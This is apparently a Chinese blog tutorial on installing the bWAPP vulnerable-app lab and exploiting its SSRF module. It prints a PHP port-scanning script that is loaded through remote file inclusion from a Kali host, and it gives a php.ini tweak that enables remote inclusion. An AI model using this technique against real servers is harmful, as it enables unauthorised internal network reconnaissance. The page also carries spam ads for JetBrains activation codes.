大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺
一、靶场介绍
集成了超过100余个网络漏洞,php web漏洞靶场,能够调制漏洞难度等级(低->中->高)。
二、靶场搭建
2.1 安装类型
搭建类型有两种:(虚拟机版本可测试测漏洞类型更多,比如破壳、心脏滴血)
- 独立安装(部署到apache + php +mysql环境下)
- 虚拟机安装(bee-box)
2.2 独立安装
》》下载解压bwapp到本地web目录下
》》编辑如下文件
》》访问如下地址,进行安装初始化
》》安装完成
》》输入用户名:密码,选择安全等级进行登录
》》登录成功
三、漏洞实战
SSRF
》》选择SSRF漏洞,点击Hack
》》如下的三个攻击场景
- 利用远程文件包含进行端口扫描(内网探测)
- 使用XXE进行文件读取(文件读取)
- 使用XXE进行SmartTV拒绝服务利用(漏洞利用)
远程文件包含端口扫描
- 这里利用的HTTP协议
》》点击任务1中如下位置,获取端口扫描脚本
》》如果没有拿到,可以去如下文件位置取出
》》进入远程文件包含漏洞模块处进行利用
》》选择语言点击Go
》》可查看到get请求地址中请求的资源文件
》》这里我们远程包含一台其它服务器资源验证远程包含是否成功(kali:192.168.226.134)
》》我们将之前的ssrf-1.txt端口扫描文件放入到kali的web目录下:
(ssrf-1.txt脚本内容(php端口扫描脚本))
<?php
if(isset($_REQUEST["ip"]))
{
//list of port numbers to scan
$ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
$results = array();
foreach($ports as $port)
{
if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
{
$results[$port] = true;
fclose($pf);
}
else
{
$results[$port] = false;
}
}
foreach($results as $port=>$val)
{
$prot = getservbyport($port,"tcp");
echo "Port $port ($prot): ";
if($val)
{
echo "<span style=\"color:green\">OK</span><br/>";
}
else
{
echo "<span style=\"color:red\">Inaccessible</span><br/>";
}
}
}
?>
》》利用远程包含探测端口
需要利用hackbar传入post目标地址的ip,从下方可直观看出扫描处的端口
》》也可以扫远程内网的其它主机(如这里的kali)
Tips:
问题:文件包含时报如下错误:
解决:
找到对应版本的php.ini php配置文件
启动远程文件包含(默认关闭)
保存文件重启服务
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/192975.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...